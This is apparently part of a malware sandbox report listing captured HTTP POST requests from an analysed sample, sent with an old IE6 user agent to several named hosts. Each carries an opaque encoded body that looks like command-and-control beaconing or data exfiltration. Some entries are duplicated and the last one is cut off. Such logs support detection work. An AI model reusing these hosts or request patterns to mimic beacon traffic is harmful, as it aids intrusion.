                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 524User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tc17.comCache-Control: no-cacheData Raw: 38 6d 41 34 38 76 77 38 58 78 46 50 46 75 39 34 70 33 51 74 42 59 2f 35 4f 66 53 55 4a 58 6c 4f 38 4f 55 4f 49 62 43 48 44 6f 7a 63 74 6a 71 58 73 41 32 58 63 6a 2b 62 35 63 51 38 70 52 36 63 58 73 67 78 6d 66 58 68 54 76 4b 64 6b 4b 37 6a 79 48 39 4b 66 64 55 45 76 48 39 71 64 47 39 76 74 50 56 53 48 38 6c 55 73 62 6a 41 49 6f 72 76 4a 44 44 55 4c 4f 31 76 47 50 77 59 35 6d 6f 68 4c 50 7a 76 31 51 69 58 43 78 38 7a 66 78 37 7a 77 41 79 54 4c 37 69 64 46 2b 36 79 47 34 2f 33 2f 54 54 75 37 6c 43 56 5a 63 33 6c 50 47 46 33 62 52 35 63 46 31 31 53 35 4b 75 30 46 56 74 69 4e 4f 71 6e 78 69 56 74 57 57 7a 62 58 73 45 39 71 55 32 4b 33 51 30 4c 65 46 68 54 4f 6e 73 59 65 59 61 6f 66 5a 68 2b 33 53 41 43 2b 71 74 73 46 59 57 5a 51 50 6e 5a 48 5a 6c 54 30 77 58 73 35 32 77 78 52 34 51 43 61 33 38 6a 59 6a 73 48 69 39 71 69 34 55 53 4a 64 72 53 74 38 30 39 64 5a 4a 47 50 78 36 38 34 72 47 5a 4d 51 76 35 46 70 75 6a 2f 2b 36 56 48 36 34 67 4a 50 73 30 4a 55 6a 66 36 73 56 6f 32 36 5a 4a 37 46 6a 31 68 52 66 67 62 59 35 55 55 71 37 71 63 75 6e 72 46 30 34 2b 4f 68 31 57 6f 41 4c 55 33 58 53 65 69 39 44 69 74 54 2f 4c 39 66 43 6f 44 46 33 6e 4e 7a 2f 46 32 69 50 68 77 68 77 66 33 74 44 69 78 42 68 48 50 56 30 42 4e 30 4a 59 43 41 63 68 32 37 74 53 79 36 32 4d 4d 47 64 74 6e 71 6b 41 76 58 42 6f 79 65 66 71 77 55 4d 31 4b 46 57 63 6c 4c 46 69 59 52 39 69 6b 62 2b 64 31 47 6a 7a 59 37 30 37 68 63 7a 63 66 72 6f 53 44 50 50 65 73 4c 34 78 63 4e 30 33 7a 39 39 32 41 31 56 2b 61 6c 37 43 4a 6d 78 53 6b 64 47 55 41 38 63 39 76 43 42 33 54 49 56 49 52 72 39 2f 6d Data Ascii: 8mA48vw8XxFPFu94p3QtBY/5OfSUJXlO8OUOIbCHDozctjqXsA2Xcj+b5cQ8pR6cXsgxmfXhTvKdkK7jyH9KfdUEvH9qdG9vtPVSH8lUsbjAIorvJDDULO1vGPwY5mohLPzv1QiXCx8zfx7zwAyTL7idF+6yG4/3/TTu7lCVZc3lPGF3bR5cF11S5Ku0FVtiNOqnxiVtWWzbXsE9qU2K3Q0LeFhTOnsYeYaofZh+3SAC+qtsFYWZQPnZHZlT0wXs52wxR4QCa38jYjsHi9qi4USJdrSt809dZJGPx684rGZMQv5Fpuj/+6VH64gJPs0JUjf6sVo26ZJ7Fj1hRfgbY5UUq7qcunrF04+Oh1WoALU3XSei9DitT/L9fCoDF3nNz/F2iPhwhwf3tDixBhHPV0BN0JYCAch27tSy62MMGdtnqkAvXBoyefqwUM1KFWclLFiYR9ikb+d1GjzY707hczcfroSDPPesL4xcN03z992A1V+al7CJmxSkdGUA8c9vCB3TIVIRr9/m
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valselit.comCache-Control: no-cacheData Raw: 6c 58 30 55 69 30 50 55 64 42 48 34 44 79 59 2f 53 6d 78 37 5a 6d 78 66 59 44 33 70 64 7a 4c 66 4a 36 5a 5a 71 4d 37 63 55 64 76 6c 57 56 49 41 69 56 64 6c 6a 74 44 6e 50 4f 4d 62 6a 55 5a 53 7a 53 4b 63 56 42 74 62 33 62 45 4b 4d 59 6f 37 6c 57 46 4e 34 31 51 79 44 55 6a 4a 6b 74 36 4f 61 4e 77 6b 78 67 41 68 7a 77 52 4c 6d 65 49 44 54 75 66 35 39 50 47 39 4c 63 54 6a 62 42 62 79 64 4e 58 78 78 70 78 76 70 61 6b 46 6f 62 52 50 30 6d 58 70 59 53 2b 4f 6d 43 42 6b 50 72 36 51 30 77 59 51 46 39 6b 48 59 4d 68 70 38 46 48 6d 73 38 58 4a 76 70 43 39 54 39 79 38 63 6f 72 4d 53 33 67 46 6e 43 57 76 2f 4a 79 4e 5a 42 76 4b 78 77 2b 31 48 77 63 68 74 2b 46 77 45 2f 52 32 4a 6a 78 32 38 77 33 4d 53 52 4c 4e 70 30 68 5a 42 33 41 4e 68 43 39 55 6b 56 48 4a 5a 6d 35 52 62 2b 48 34 6e 6c 41 54 68 55 4d 42 58 44 58 4f 41 76 2b 6b 76 49 7a 77 4a 39 76 39 49 58 67 74 44 65 33 47 4b 4d 58 51 7a 35 39 48 47 77 75 54 4c 4b 62 6d 4b 2b 33 34 56 4e 71 76 33 2f 67 4d 2b 64 49 66 34 7a 2b 78 42 31 33 59 49 47 59 66 66 54 65 6c 36 6a 54 54 42 71 46 69 51 45 5a 43 6f 64 65 49 2f 30 71 42 46 38 72 74 37 44 32 35 56 48 7a 5a 54 57 76 6e 56 4c 62 32 48 44 59 50 45 70 4f 52 36 43 35 4c 75 2b 5a 4a 65 35 35 70 73 61 75 45 4c 4b 59 76 32 36 47 66 65 79 72 61 59 41 46 4d 6c 44 32 77 30 71 5a 36 42 51 71 45 4f 5a 64 35 57 50 32 6a 76 59 4f 31 4e 6e 74 66 71 31 5a 55 77 64 33 57 59 4f 2b 75 43 77 69 74 39 58 72 6a 36 2b 67 6d 67 55 58 4f 70 49 7a 78 45 2f 77 74 6c 6b 49 70 39 73 35 5a 32 78 70 69 53 4d 6b 58 71 58 42 43 69 4d 34 6a 51 2b 53 47 48 62 54 4f 42 59 6d 39 50 55 6f 37 44 4c 69 52 62 57 49 6e 4c 41 3d 3d Data Ascii: lX0Ui0PUdBH4DyY/Smx7ZmxfYD3pdzLfJ6ZZqM7cUdvlWVIAiVdljtDnPOMbjUZSzSKcVBtb3bEKMYo7lWFN41QyDUjJkt6OaNwkxgAhzwRLmeIDTuf59PG9LcTjbBbydNXxxpxvpakFobRP0mXpYS+OmCBkPr6Q0wYQF9kHYMhp8FHms8XJvpC9T9y8corMS3gFnCWv/JyNZBvKxw+1Hwcht+FwE/R2Jjx28w3MSRLNp0hZB3ANhC9UkVHJZm5Rb+H4nlAThUMBXDXOAv+kvIzwJ9v9IXgtDe3GKMXQz59HGwuTLKbmK+34VNqv3/gM+dIf4z+xB13YIGYffTel6jTTBqFiQEZCodeI/0qBF8rt7D25VHzZTWvnVLb2HDYPEpOR6C5Lu+ZJe55psauELKYv26GfeyraYAFMlD2w0qZ6BQqEOZd5WP2jvYO1Nntfq1ZUwd3WYO+uCwit9Xrj6+gmgUXOpIzxE/wtlkIp9s5Z2xpiSMkXqXBCiM4jQ+SGHbTOBYm9PUo7DLiRbWInLA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.crcsi.orgCache-Control: no-cacheData Raw: 36 32 53 32 69 34 58 5a 64 42 47 39 46 64 42 4a 72 50 30 46 37 50 36 50 74 31 4e 54 71 7a 74 39 69 53 35 4d 65 37 2b 67 6d 6a 46 69 59 6c 67 66 41 46 6c 75 4e 50 66 70 37 65 6d 45 7a 65 4f 37 34 45 47 6a 72 68 6a 76 4c 38 55 49 43 33 46 55 65 61 48 66 4f 70 68 70 47 78 4f 78 43 41 77 45 6c 2b 62 53 4f 4c 5a 57 41 36 62 72 64 6d 6c 67 6c 38 69 45 77 58 50 52 63 44 75 48 69 67 5a 44 4b 48 62 6f 4b 7a 2f 4f 4c 67 36 44 67 79 57 64 36 2f 33 38 4b 41 33 33 59 64 78 4c 6b 56 30 59 4e 4c 73 66 49 42 64 69 61 75 79 2f 38 77 6c 56 38 35 66 64 2f 41 51 66 34 56 34 4e 43 49 4e 70 79 61 72 7a 4c 74 58 71 6e 71 57 62 62 7a 32 72 4c 58 63 57 63 32 33 37 6c 44 5a 33 56 36 6f 49 50 77 76 4e 50 30 61 74 31 57 6f 68 37 34 54 38 66 48 77 41 73 38 36 33 73 57 35 36 78 72 4f 56 4e 59 56 50 53 70 58 4d 78 41 55 54 50 7a 5a 55 70 70 74 71 70 30 39 65 6f 45 58 35 5a 77 4b 61 76 77 46 57 56 61 4c 59 30 75 4d 7a 52 63 4b 6d 77 61 63 59 49 79 32 64 43 2f 47 32 74 2b 36 55 73 6f 65 47 38 34 66 74 42 2f 68 65 39 5a 68 78 34 56 31 4a 32 50 61 2b 56 5a 73 54 75 54 33 37 2f 45 39 71 67 5a 37 41 68 62 54 79 6b 75 2f 2f 42 76 35 55 4e 66 4e 69 51 62 36 63 4e 33 4e 74 6f 67 6f 6c 34 71 68 74 77 58 68 63 4c 64 76 43 65 52 67 66 49 35 73 65 44 4f 76 78 31 6c 32 50 39 52 68 76 56 35 2f 4f 4a 7a 71 67 38 43 4d 48 36 79 70 36 30 76 65 6b 7a 77 39 4b 42 58 6b 79 63 51 4d 54 63 52 5a 51 54 43 79 6f 67 4a 32 56 76 71 7a 4a 4b 36 30 70 74 6c 70 55 6f 58 59 69 38 79 58 6c 61 6c 4c 5a 7a 61 37 58 42 4b 67 4a 45 46 55 57 5a 67 32 59 51 64 62 65 2b 4b 38 33 72 49 41 71 78 2f 41 66 4e 4c 50 49 72 37 64 32 6e 71 63 45 76 42 55 5a 47 38 74 76 6e 78 42 30 39 51 4a 71 4e 7a 7a 58 37 74 71 6a 52 6b 4e 36 2f 46 77 3d Data Ascii: 62S2i4XZdBG9FdBJrP0F7P6Pt1NTqzt9iS5Me7+gmjFiYlgfAFluNPfp7emEzeO74EGjrhjvL8UIC3FUeaHfOphpGxOxCAwEl+bSOLZWA6brdmlgl8iEwXPRcDuHigZDKHboKz/OLg6DgyWd6/38KA33YdxLkV0YNLsfIBdiauy/8wlV85fd/AQf4V4NCINpyarzLtXqnqWbbz2rLXcWc237lDZ3V6oIPwvNP0at1Woh74T8fHwAs863sW56xrOVNYVPSpXMxAUTPzZUpptqp09eoEX5ZwKavwFWVaLY0uMzRcKmwacYIy2dC/G2t+6UsoeG84ftB/he9Zhx4V1J2Pa+VZsTuT37/E9qgZ7AhbTyku//Bv5UNfNiQb6cN3Ntogol4qhtwXhcLdvCeRgfI5seDOvx1l2P9RhvV5/OJzqg8CMH6yp60vekzw9KBXkycQMTcRZQTCyogJ2VvqzJK60ptlpUoXYi8yXlalLZza7XBKgJEFUWZg2YQdbe+K83rIAqx/AfNLPIr7d2nqcEvBUZG8tvnxB09QJqNzzX7tqjRkN6/Fw=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 66 77 55 79 63 4f 71 46 6e 52 46 53 69 32 69 30 7a 66 79 6a 2b 4b 32 71 6e 64 55 61 5a 48 46 66 76 76 61 69 54 67 36 47 32 30 69 2b 6f 57 58 77 5a 76 73 52 36 74 4e 52 74 62 39 73 49 67 68 66 76 41 34 45 55 37 65 4d 41 6a 58 4d 52 32 67 57 2b 70 39 63 70 6e 38 76 4c 46 61 35 33 6c 6b 37 33 35 63 31 63 4d 42 6a 55 5a 39 54 69 32 66 6c 39 78 61 33 36 73 62 46 33 68 76 57 66 74 34 2f 59 6b 6a 4d 62 30 6e 5a 47 55 6b 69 4c 57 30 6a 4e 7a 69 50 4a 64 42 51 64 2b 4d 70 66 73 75 57 39 66 68 63 6a 78 53 58 4d 37 58 32 6b 45 32 77 66 6e 50 67 66 35 4e 65 49 6a 4b 30 54 41 32 33 54 4e 4b 52 4d 44 39 36 67 43 4e 33 4b 44 7a 76 6a 6f 61 32 4e 38 72 5a 6a 4b 6c 4d 34 50 5a 6f 72 36 41 67 48 46 5a 4b 66 4f 69 2f 70 4a 48 7a 46 68 49 66 6a 32 4b 41 50 70 65 6a 75 47 54 6d 57 75 35 68 50 78 62 63 57 70 56 4b 6b 6d 55 4b 77 72 2b 2b 44 34 4a 59 6a 79 50 79 69 33 30 30 65 36 57 33 6b 43 66 2b 49 41 63 30 48 53 34 48 32 48 47 61 73 50 46 4f 75 5a 36 43 53 63 56 55 76 64 31 69 63 37 44 6d 62 34 35 52 43 67 54 78 2f 36 70 44 39 34 4b 71 57 5a 2f 47 65 70 47 58 67 65 46 70 47 6f 55 50 59 76 78 52 61 71 64 6c 51 7a 61 65 66 69 64 66 34 55 41 34 7a 70 70 43 4d 52 51 51 65 48 6b 69 61 33 4a 6b 74 41 45 6f 4f 62 39 2f 58 56 35 46 4c 7a 44 37 62 34 68 4d 77 79 31 66 30 64 6d 50 78 71 64 65 35 52 31 63 6f 69 47 43 58 6d 34 63 5a 31 51 42 4f 56 42 4d 54 38 4b 66 4f 71 35 52 33 46 51 43 67 73 36 77 63 36 78 52 4d 56 51 68 77 6f 76 76 33 57 38 52 70 45 70 74 48 53 62 74 7a 61 43 6c 6e 4e 57 48 71 43 59 45 67 4b 54 2b 68 75 43 36 4c 38 75 79 5a 58 51 36 6b 6c 46 6e 52 6f 2b 2b 6c 58 70 50 75 78 37 70 Data Ascii: fwUycOqFnRFSi2i0zfyj+K2qndUaZHFfvvaiTg6G20i+oWXwZvsR6tNRtb9sIghfvA4EU7eMAjXMR2gW+p9cpn8vLFa53lk735c1cMBjUZ9Ti2fl9xa36sbF3hvWft4/YkjMb0nZGUkiLW0jNziPJdBQd+MpfsuW9fhcjxSXM7X2kE2wfnPgf5NeIjK0TA23TNKRMD96gCN3KDzvjoa2N8rZjKlM4PZor6AgHFZKfOi/pJHzFhIfj2KAPpejuGTmWu5hPxbcWpVKkmUKwr++D4JYjyPyi300e6W3kCf+IAc0HS4H2HGasPFOuZ6CScVUvd1ic7Dmb45RCgTx/6pD94KqWZ/GepGXgeFpGoUPYvxRaqdlQzaefidf4UA4zppCMRQQeHkia3JktAEoOb9/XV5FLzD7b4hMwy1f0dmPxqde5R1coiGCXm4cZ1QBOVBMT8KfOq5R3FQCgs6wc6xRMVQhwovv3W8RpEptHSbtzaClnNWHqCYEgKT+huC6L8uyZXQ6klFnRo++lXpPux7p
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stajum.comCache-Control: no-cacheData Raw: 6b 71 69 42 51 64 44 41 65 68 48 46 58 4b 47 38 59 35 33 4e 33 49 4d 77 4a 4d 7a 34 4a 78 66 31 42 4a 33 4d 78 39 67 66 34 62 52 4d 35 42 57 4b 47 5a 34 6a 36 69 59 63 76 63 49 68 79 42 49 5a 4b 31 55 47 61 6a 46 34 34 41 64 39 53 37 65 70 75 72 65 4e 70 4a 4a 33 64 54 30 50 36 6e 63 51 68 47 69 50 75 32 5a 41 57 77 62 63 4c 6c 64 37 4b 39 41 6e 2f 59 50 63 67 61 4a 50 30 66 77 6e 70 32 62 6a 7a 54 79 56 4e 6f 39 41 44 73 45 4c 50 63 74 69 6a 45 6e 53 74 6a 36 4a 46 6b 67 79 69 57 4c 6c 6e 34 33 66 57 50 43 71 4e 6c 59 4b 71 54 38 6f 30 45 52 7a 7a 66 68 65 4f 49 66 77 50 46 74 53 58 2b 61 6e 68 75 6e 63 50 67 69 79 34 30 2f 6a 52 66 4f 5a 77 31 73 68 71 56 78 45 4c 73 4d 74 45 64 56 71 6b 43 53 65 54 70 31 38 39 30 71 58 73 52 39 6c 74 39 6f 32 6a 67 43 49 35 6b 6c 4b 33 38 4e 2b 66 58 4b 4f 70 54 70 6b 55 2f 50 45 63 34 56 66 74 72 51 47 43 64 53 5a 78 5a 54 53 76 71 35 4f 41 70 4a 63 74 76 44 39 33 6b 41 68 53 35 4d 74 56 4a 32 63 33 67 39 31 2f 51 42 73 51 6f 54 79 78 39 6a 54 47 4b 62 38 4c 45 64 79 43 4d 43 70 52 6f 79 76 64 71 6a 36 76 70 77 35 6e 6b 6e 79 4f 30 68 56 4e 42 68 53 54 36 51 42 30 4f 73 49 6d 72 31 34 2f 67 68 43 72 6d 74 37 55 67 4f 79 4f 7a 4d 4d 39 49 34 2b 51 64 69 44 51 50 6f 48 42 44 35 78 39 32 6b 63 39 46 75 61 37 4a 2b 49 71 38 5a 44 42 69 70 2f 7a 58 65 43 34 48 49 71 43 45 66 53 46 32 79 4a 51 4d 67 32 75 6f 34 64 41 4b 62 63 57 58 78 67 48 2b 2f 63 74 78 45 7a 6b 5a 71 4e 31 78 56 47 6c 30 70 33 55 55 78 36 65 43 65 49 4c 58 70 73 4d 42 38 34 47 4e 77 7a 72 46 6d 4d 34 64 6e 67 31 4d 30 37 37 62 42 4b 4e 6f 42 77 64 64 65 6b 50 47 57 48 6b 4e 38 2f 4b 54 6a 42 52 4b 50 47 6d 50 5a 4c 48 75 70 6c 70 78 75 57 54 50 77 72 65 41 3d 3d Data Ascii: kqiBQdDAehHFXKG8Y53N3IMwJMz4Jxf1BJ3Mx9gf4bRM5BWKGZ4j6iYcvcIhyBIZK1UGajF44Ad9S7epureNpJJ3dT0P6ncQhGiPu2ZAWwbcLld7K9An/YPcgaJP0fwnp2bjzTyVNo9ADsELPctijEnStj6JFkgyiWLln43fWPCqNlYKqT8o0ERzzfheOIfwPFtSX+anhuncPgiy40/jRfOZw1shqVxELsMtEdVqkCSeTp1890qXsR9lt9o2jgCI5klK38N+fXKOpTpkU/PEc4VftrQGCdSZxZTSvq5OApJctvD93kAhS5MtVJ2c3g91/QBsQoTyx9jTGKb8LEdyCMCpRoyvdqj6vpw5nknyO0hVNBhST6QB0OsImr14/ghCrmt7UgOyOzMM9I4+QdiDQPoHBD5x92kc9Fua7J+Iq8ZDBip/zXeC4HIqCEfSF2yJQMg2uo4dAKbcWXxgH+/ctxEzkZqN1xVGl0p3UUx6eCeILXpsMB84GNwzrFmM4dng1M077bBKNoBwddekPGWHkN8/KTjBRKPGmPZLHuplpxuWTPwreA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.2print.comCache-Control: no-cacheData Raw: 79 31 45 61 56 30 36 31 6e 42 46 57 64 45 6e 38 32 54 77 2f 52 72 48 6a 2b 2b 4e 4f 34 56 55 32 59 73 49 7a 66 4b 47 53 78 33 63 5a 33 71 61 66 4c 6d 76 76 42 70 31 57 37 30 52 6a 38 79 44 6f 32 64 64 6c 71 70 6d 4e 63 45 4b 69 51 6c 6b 2f 68 73 48 41 59 76 35 43 76 67 36 4d 48 46 2f 57 6e 55 4a 6a 5a 57 2b 36 71 67 37 33 31 33 6e 75 53 71 72 57 39 65 41 74 4f 70 6e 76 2b 56 57 5a 53 78 69 69 74 6c 79 68 7a 36 65 52 6a 32 67 2b 6e 68 2b 4f 55 58 43 52 74 5a 76 75 6a 61 68 74 7a 65 4f 2f 75 43 78 43 78 62 47 4a 62 35 42 67 43 35 2f 76 58 76 79 62 2b 31 32 51 36 59 79 5a 76 30 64 6f 6f 65 73 5a 63 68 77 55 6a 34 55 62 39 61 58 6c 65 77 6a 56 70 4c 31 5a 75 65 32 55 71 78 32 61 31 48 71 73 6a 4e 47 37 38 49 54 73 56 64 45 5a 50 49 6f 51 4e 61 69 45 57 54 59 55 6d 6d 4b 2f 62 2b 4b 6e 6f 42 4c 6e 4e 52 4d 31 62 70 76 4d 48 4b 2f 61 48 6e 48 2f 71 63 37 44 31 6c 33 6c 36 43 52 66 2b 47 38 63 30 31 65 6e 4e 4b 4a 71 33 56 6e 74 69 34 44 48 71 69 4a 33 34 74 77 54 46 4f 61 6c 59 37 7a 52 5a 2b 4a 7a 66 62 38 4f 64 67 38 74 66 54 65 77 62 52 47 57 74 65 61 37 71 41 38 37 57 45 51 39 78 2f 7a 64 47 52 51 4e 38 48 76 32 4b 53 35 43 6c 52 37 68 67 72 39 45 4c 49 56 78 66 72 36 44 76 48 66 77 46 67 6f 57 43 72 71 73 66 36 6a 79 61 6f 4c 71 52 48 73 43 73 6c 6c 68 6c 45 6c 38 59 50 35 77 69 67 48 46 2b 46 65 5a 6a 6d 4f 6a 78 4b 55 48 34 6d 6a 65 79 71 6b 48 66 51 55 30 4e 41 30 30 7a 33 69 66 34 50 2b 76 77 66 76 4c 6d 58 52 77 35 77 47 48 36 44 79 45 71 33 6e 76 70 35 33 37 4f 7a 77 55 63 6f 51 73 56 73 78 58 6d 64 57 35 48 64 4f 30 4e 34 49 61 70 57 38 44 75 49 4e 4f 4d 68 78 2b 6d 37 2f 48 78 67 33 75 73 6e 75 56 2b 4c 54 32 6e 48 39 5a 75 66 79 42 6c 77 4e 4a 64 44 2b 4b 75 35 74 2f 52 59 69 72 6c 53 43 37 49 63 47 73 38 68 4e 7a 32 41 3d 3d Data Ascii: y1EaV061nBFWdEn82Tw/RrHj++NO4VU2YsIzfKGSx3cZ3qafLmvvBp1W70Rj8yDo2ddlqpmNcEKiQlk/hsHAYv5Cvg6MHF/WnUJjZW+6qg7313nuSqrW9eAtOpnv+VWZSxiitlyhz6eRj2g+nh+OUXCRtZvujahtzeO/uCxCxbGJb5BgC5/vXvyb+12Q6YyZv0dooesZchwUj4Ub9aXlewjVpL1Zue2Uqx2a1HqsjNG78ITsVdEZPIoQNaiEWTYUmmK/b+KnoBLnNRM1bpvMHK/aHnH/qc7D1l3l6CRf+G8c01enNKJq3Vnti4DHqiJ34twTFOalY7zRZ+Jzfb8Odg8tfTewbRGWtea7qA87WEQ9x/zdGRQN8Hv2KS5ClR7hgr9ELIVxfr6DvHfwFgoWCrqsf6jyaoLqRHsCsllhlEl8YP5wigHF+FeZjmOjxKUH4mjeyqkHfQU0NA00z3if4P+vwfvLmXRw5wGH6DyEq3nvp537OzwUcoQsVsxXmdW5HdO0N4IapW8DuINOMhx+m7/Hxg3usnuV+LT2nH9ZufyBlwNJdD+Ku5t/RYirlSC7IcGs8hNz2A==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 66 77 55 79 63 4f 71 46 6e 52 46 53 69 32 69 30 7a 66 79 6a 2b 4b 32 71 6e 64 55 61 5a 48 46 66 76 76 61 69 54 67 36 47 32 30 69 2b 6f 57 58 77 5a 76 73 52 36 74 4e 52 74 62 39 73 49 67 68 66 76 41 34 45 55 37 65 4d 41 6a 58 4d 52 32 67 57 2b 70 39 63 70 6e 38 76 4c 46 61 35 33 6c 6b 37 33 35 63 31 63 4d 42 6a 55 5a 39 54 69 32 66 6c 39 78 61 33 36 73 62 46 33 68 76 57 66 74 34 2f 59 6b 6a 4d 62 30 6e 5a 47 55 6b 69 4c 57 30 6a 4e 7a 69 50 4a 64 42 51 64 2b 4d 70 66 73 75 57 39 66 68 63 6a 78 53 58 4d 37 58 32 6b 45 32 77 66 6e 50 67 66 35 4e 65 49 6a 4b 30 54 41 32 33 54 4e 4b 52 4d 44 39 36 67 43 4e 33 4b 44 7a 76 6a 6f 61 32 4e 38 72 5a 6a 4b 6c 4d 34 50 5a 6f 72 36 41 67 48 46 5a 4b 66 4f 69 2f 70 4a 48 7a 46 68 49 66 6a 32 4b 41 50 70 65 6a 75 47 54 6d 57 75 35 68 50 78 62 63 57 70 56 4b 6b 6d 55 4b 77 72 2b 2b 44 34 4a 59 6a 79 50 79 69 33 30 30 65 36 57 33 6b 43 66 2b 49 41 63 30 48 53 34 48 32 48 47 61 73 50 46 4f 75 5a 36 43 53 63 56 55 76 64 31 69 63 37 44 6d 62 34 35 52 43 67 54 78 2f 36 70 44 39 34 4b 71 57 5a 2f 47 65 70 47 58 67 65 46 70 47 6f 55 50 59 76 78 52 61 71 64 6c 51 7a 61 65 66 69 64 66 34 55 41 34 7a 70 70 43 4d 52 51 51 65 48 6b 69 61 33 4a 6b 74 41 45 6f 4f 62 39 2f 58 56 35 46 4c 7a 44 37 62 34 68 4d 77 79 31 66 30 64 6d 50 78 71 64 65 35 52 31 63 6f 69 47 43 58 6d 34 63 5a 31 51 42 4f 56 42 4d 54 38 4b 66 4f 71 35 52 33 46 51 43 67 73 36 77 63 36 78 52 4d 56 51 68 77 6f 76 76 33 57 38 52 70 45 70 74 48 53 62 74 7a 61 43 6c 6e 4e 57 48 71 43 59 45 67 4b 54 2b 68 75 43 36 4c 38 75 79 5a 58 51 36 6b 6c 46 6e 52 6f 2b 2b 6c 58 70 50 75 78 37 70 Data Ascii: fwUycOqFnRFSi2i0zfyj+K2qndUaZHFfvvaiTg6G20i+oWXwZvsR6tNRtb9sIghfvA4EU7eMAjXMR2gW+p9cpn8vLFa53lk735c1cMBjUZ9Ti2fl9xa36sbF3hvWft4/YkjMb0nZGUkiLW0jNziPJdBQd+MpfsuW9fhcjxSXM7X2kE2wfnPgf5NeIjK0TA23TNKRMD96gCN3KDzvjoa2N8rZjKlM4PZor6AgHFZKfOi/pJHzFhIfj2KAPpejuGTmWu5hPxbcWpVKkmUKwr++D4JYjyPyi300e6W3kCf+IAc0HS4H2HGasPFOuZ6CScVUvd1ic7Dmb45RCgTx/6pD94KqWZ/GepGXgeFpGoUPYvxRaqdlQzaefidf4UA4zppCMRQQeHkia3JktAEoOb9/XV5FLzD7b4hMwy1f0dmPxqde5R1coiGCXm4cZ1QBOVBMT8KfOq5R3FQCgs6wc6xRMVQhwovv3W8RpEptHSbtzaClnNWHqCYEgKT+huC6L8uyZXQ6klFnRo++lXpPux7p
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stajum.comCache-Control: no-cacheData Raw: 6b 71 69 42 51 64 44 41 65 68 48 46 58 4b 47 38 59 35 33 4e 33 49 4d 77 4a 4d 7a 34 4a 78 66 31 42 4a 33 4d 78 39 67 66 34 62 52 4d 35 42 57 4b 47 5a 34 6a 36 69 59 63 76 63 49 68 79 42 49 5a 4b 31 55 47 61 6a 46 34 34 41 64 39 53 37 65 70 75 72 65 4e 70 4a 4a 33 64 54 30 50 36 6e 63 51 68 47 69 50 75 32 5a 41 57 77 62 63 4c 6c 64 37 4b 39 41 6e 2f 59 50 63 67 61 4a 50 30 66 77 6e 70 32 62 6a 7a 54 79 56 4e 6f 39 41 44 73 45 4c 50 63 74 69 6a 45 6e 53 74 6a 36 4a 46 6b 67 79 69 57 4c 6c 6e 34 33 66 57 50 43 71 4e 6c 59 4b 71 54 38 6f 30 45 52 7a 7a 66 68 65 4f 49 66 77 50 46 74 53 58 2b 61 6e 68 75 6e 63 50 67 69 79 34 30 2f 6a 52 66 4f 5a 77 31 73 68 71 56 78 45 4c 73 4d 74 45 64 56 71 6b 43 53 65 54 70 31 38 39 30 71 58 73 52 39 6c 74 39 6f 32 6a 67 43 49 35 6b 6c 4b 33 38 4e 2b 66 58 4b 4f 70 54 70 6b 55 2f 50 45 63 34 56 66 74 72 51 47 43 64 53 5a 78 5a 54 53 76 71 35 4f 41 70 4a 63 74 76 44 39 33 6b 41 68 53 35 4d 74 56 4a 32 63 33 67 39 31 2f 51 42 73 51 6f 54 79 78 39 6a 54 47 4b 62 38 4c 45 64 79 43 4d 43 70 52 6f 79 76 64 71 6a 36 76 70 77 35 6e 6b 6e 79 4f 30 68 56 4e 42 68 53 54 36 51 42 30 4f 73 49 6d 72 31 34 2f 67 68 43 72 6d 74 37 55 67 4f 79 4f 7a 4d 4d 39 49 34 2b 51 64 69 44 51 50 6f 48 42 44 35 78 39 32 6b 63 39 46 75 61 37 4a 2b 49 71 38 5a 44 42 69 70 2f 7a 58 65 43 34 48 49 71 43 45 66 53 46 32 79 4a 51 4d 67 32 75 6f 34 64 41 4b 62 63 57 58 78 67 48 2b 2f 63 74 78 45 7a 6b 5a 71 4e 31 78 56 47 6c 30 70 33 55 55 78 36 65 43 65 49 4c 58 70 73 4d 42 38 34 47 4e 77 7a 72 46 6d 4d 34 64 6e 67 31 4d 30 37 37 62 42 4b 4e 6f 42 77 64 64 65 6b 50 47 57 48 6b 4e 38 2f 4b 54 6a 42 52 4b 50 47 6d 50 5a 4c 48 75 70 6c 70 78 75 57 54 50 77 72 65 41 3d 3d Data Ascii: 